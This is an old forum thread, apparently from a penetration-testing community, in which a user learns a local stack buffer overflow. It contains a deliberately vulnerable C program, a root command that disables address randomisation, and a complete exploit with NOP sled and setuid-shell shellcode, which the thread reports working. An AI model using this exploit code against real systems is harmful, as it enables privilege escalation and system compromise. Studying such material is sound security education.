
Thread: Buffer Overflow

  1. #1
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default Buffer Overflow

    I was wondering if anyone could make a tutorial or a video that demonstrates a simple buffer overflow on BackTrack. I tried a lot of tutorials already but none of them work on BackTrack.

  2. #2
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    What exactly do you need? A simple theoretical example with C source code and a debugger, or something more complex (in the second case I cannot help you)?

  3. #3
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    I would like to exploit this code
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   // strcpy

    // 1024 bytes buffer
    // 4 bytes to overwrite ebp
    // 4 bytes to overwrite eip
    // 1032 bytes :)

    void viewer(char *string)
    {
        char buffer[1024];

        strcpy(buffer, string);   // unbounded copy: this is the overflow

        printf("You have entered: %s\n", buffer);

        return;
    }

    int main(int argc, char *argv[])
    {
        if (argc < 2)
        {
            printf("%s <something>\n", argv[0]);
            return 0;
        }

        viewer(argv[1]);
        return 0;
    }
    with a shellcode.

    I tried various tutorials already but none of them seem to work on BackTrack.

    Like when I load an egg and then use an eggfinder, the address changes all the time.
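For contrast with the viewer() posted above, here is a bounded counterpart (an added example, not code from this thread): the stack buffer keeps its 1024 bytes, but the copy can no longer run past it, so the 1032-byte argument discussed here stops at byte 1023 instead of reaching the saved ebp and eip. The names viewer_safe, VIEW_BUF and constructed_input are mine, and the test input is constructed inline.

```c
#include <stdio.h>
#include <string.h>

#define VIEW_BUF 1024   /* same buffer size as the thread's viewer() */

/* Bounded version of viewer(): the copy never exceeds the stack buffer and the
 * buffer is always NUL-terminated, so an overlong argument is truncated rather
 * than overwriting the saved frame pointer and return address.
 * Returns the number of bytes kept; comparing that with strlen(string) lets a
 * caller notice truncation instead of losing data silently. */
size_t viewer_safe(const char *string)
{
    char buffer[VIEW_BUF];
    size_t len = strlen(string);

    if (len >= sizeof buffer) {
        memcpy(buffer, string, sizeof buffer - 1);
        buffer[sizeof buffer - 1] = '\0';
        fprintf(stderr, "warning: %zu-byte input truncated to %zu bytes\n",
                len, sizeof buffer - 1);
    } else {
        memcpy(buffer, string, len + 1);   /* len + 1 includes the NUL */
    }
    printf("You have entered: %s\n", buffer);
    return strlen(buffer);
}

/* Constructed test input: n bytes of 'A' (capped at 2047), mirroring the
 * 1032-byte string the thread talks about. */
const char *constructed_input(size_t n)
{
    static char s[2048];
    if (n > sizeof s - 1) n = sizeof s - 1;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("%s <something>\n", argv[0]);
        return 0;
    }
    viewer_safe(argv[1]);
    return 0;
}
```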

  4. #4
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Dear UnnamedOne,

    Could you please check this thread:
    http://forums.remote-exploit.org/showthread.php?t=14255

    We have been discussing recreating buffer overflows from known exploits; we will be happy if you join us.

  5. #5
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    Mmm... If I've not misunderstood, your problem is the randomization of memory (kernels starting from 2.6.12 add a stack protection by default).

    Type from a shell (as root):

    Code:
    echo 0 > /proc/sys/kernel/randomize_va_space
    It should work until the next reboot.

  6. #6
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Quote Originally Posted by kanto.86
    Mmm... If I've not misunderstood, your problem is the randomization of memory (kernels starting from 2.6.12 add a stack protection by default).

    Type from a shell (as root):

    Code:
    echo 0 > /proc/sys/kernel/randomize_va_space
    It should work until the next reboot.
    I really have to thank you. Works great now!

    EDIT: Well, it works by loading an egg, but not with this code.

    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>   // execl

    #define NOP 0x90      // defining the NOP
    #define VUL_FILE "./vuln"

    char shellcode[] =
        "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
        "\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e" // our shellcode
        "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
        "\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

    unsigned long get_sp(void)
    {
        __asm__("movl %esp, %eax");   // this function returns the stack pointer address, hopefully where
    }                                 // our shellcode is stored.

    int main(int argc, char *argv[], char **envp)
    {
        int buff = 1032;              // size of the vuln buffer.
        unsigned long addr;       // addr of shellcode.
        char *ptr;                    // used for adding nops etc.
        if(argc > 1)
            buff = atoi(argv[1]);     // if the user supplies a size, use this instead.

        if((buff % 4) != 0)           // if the size is not a mem addr (divisible by 4)
            buff = buff + 4 - (buff % 4);   // add 4 to it, take away the remainder (makes it divisible by 4)

        if((ptr = (char *)malloc(buff)) == NULL)   // check to see you allocated enough memory.
        {
            printf("Error allocating memory.\n");
            exit(0);
        }
        addr = get_sp();                  // get the address of our shellcode hopefully.
        memset(ptr, NOP, buff);       // fill the buffer with NOPS making our chances higher.
        memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode));   // store the shellcode in the buffer.
        *(long *)&ptr[buff - 4] = addr;   // make eip point to our shellcode.
        execl(VUL_FILE, "exploit example1", ptr, NULL);   // execute the vuln program with our NOPS&shellcode in the buffer.
        printf("Addr: 0x%lx\n", addr);    // only reached if execl fails (was printed with %s, a format bug)
        return 0;
    }

  7. #7
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    The source code appears to be OK. The only other information I can give you is that some OSes mark the stack as "not executable" (precisely to prevent stack overflows, which is also why heap overflows and return-into-libc exist).

    I think you should look at the thread posted by l1nuxant_ee. My advice is to try one of the known exploits and see what happens: if everything works, an error may be present in your code. Otherwise the stack may be "not executable" and we have to change this setting (or we need the help of someone more expert).
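The "not executable" stack mentioned above is, on Linux, requested per binary through the PT_GNU_STACK program header, which the loader reads to decide the stack's permissions. The following check is an added example, not code from this thread: it parses that header out of an ELF64 image held in memory and reports whether the stack would be executable. The struct layouts and constants are copied from the ELF specification so that no <elf.h> is needed, the function names are mine, and the sample image is constructed inline (a little-endian host is assumed).

```c
#include <stdint.h>
#include <string.h>
/* Minimal ELF64 layouts and constants from the ELF spec, so this compiles
 * without <elf.h>. Assumes a little-endian host (x86/x86-64). */
typedef struct {                       /* Elf64_Ehdr */
    unsigned char e_ident[16]; uint16_t e_type, e_machine; uint32_t e_version;
    uint64_t e_entry, e_phoff, e_shoff; uint32_t e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
} Ehdr64;
typedef struct {                       /* Elf64_Phdr */
    uint32_t p_type, p_flags;
    uint64_t p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align;
} Phdr64;
#define PT_GNU_STACK 0x6474e551u       /* header that carries the stack permissions */
#define PF_X 1u                        /* executable bit in p_flags */

/* PT_GNU_STACK p_flags of an ELF64 image held in memory, or -1 if it is not
 * ELF64 or has no such header (Linux x86 then falls back to an executable
 * stack, the legacy behaviour). Every read is bounds-checked first. */
int gnu_stack_flags(const unsigned char *img, size_t len)
{
    Ehdr64 eh;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, "\x7f" "ELF", 4) != 0 || eh.e_ident[4] != 2) return -1; /* 2 = ELFCLASS64 */
    if (eh.e_phentsize != sizeof(Phdr64) || eh.e_phoff > len) return -1;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Phdr64 ph;
        size_t off = (size_t)eh.e_phoff + (size_t)i * sizeof ph;
        if (off + sizeof ph > len) return -1;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) return (int)ph.p_flags;
    }
    return -1;
}

/* 1 if the loader would map the stack executable, 0 if not, -1 if no marker. */
int stack_is_executable(const unsigned char *img, size_t len)
{
    int f = gnu_stack_flags(img, len);
    return f < 0 ? -1 : (int)((f & PF_X) != 0);
}

/* Constructed sample: an ELF64 header plus one PT_GNU_STACK entry with the
 * given flags (not loadable, just enough to exercise the check end to end). */
int sample_check(uint32_t flags)
{
    unsigned char img[sizeof(Ehdr64) + sizeof(Phdr64)];
    Ehdr64 eh = {{0}}; Phdr64 ph = {0};
    memcpy(eh.e_ident, "\x7f" "ELF", 4); eh.e_ident[4] = 2;
    eh.e_phoff = sizeof eh; eh.e_phentsize = sizeof ph; eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK; ph.p_flags = flags;
    memcpy(img, &eh, sizeof eh); memcpy(img + sizeof eh, &ph, sizeof ph);
    return stack_is_executable(img, sizeof img);
}
```

On a real binary, read the file into a buffer and pass it to stack_is_executable; a result of 1 means the program was linked with an executable stack (the same thing the GNU execstack tool reports).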

  8. #8
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Quote Originally Posted by kanto.86
    The source code appears to be OK. The only other information I can give you is that some OSes mark the stack as "not executable" (precisely to prevent stack overflows, which is also why heap overflows and return-into-libc exist).

    I think you should look at the thread posted by l1nuxant_ee. My advice is to try one of the known exploits and see what happens: if everything works, an error may be present in your code. Otherwise the stack may be "not executable" and we have to change this setting (or we need the help of someone more expert).
    Don't ask me why, but I removed
    Code:
    addr = get_sp();                  // get the address of our shellcode hopefully.
    and changed
    Code:
    unsigned long addr;       // addr of shellcode.
    to
    Code:
    unsigned long addr = get_sp();       // addr of shellcode.
    and now the code works fine.

    Time to learn remote buffer overflows now, I think.

  9. #9
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    Haha! Cool!! We won't ask about this mystery of C, but we are happy that everything now works. Great!
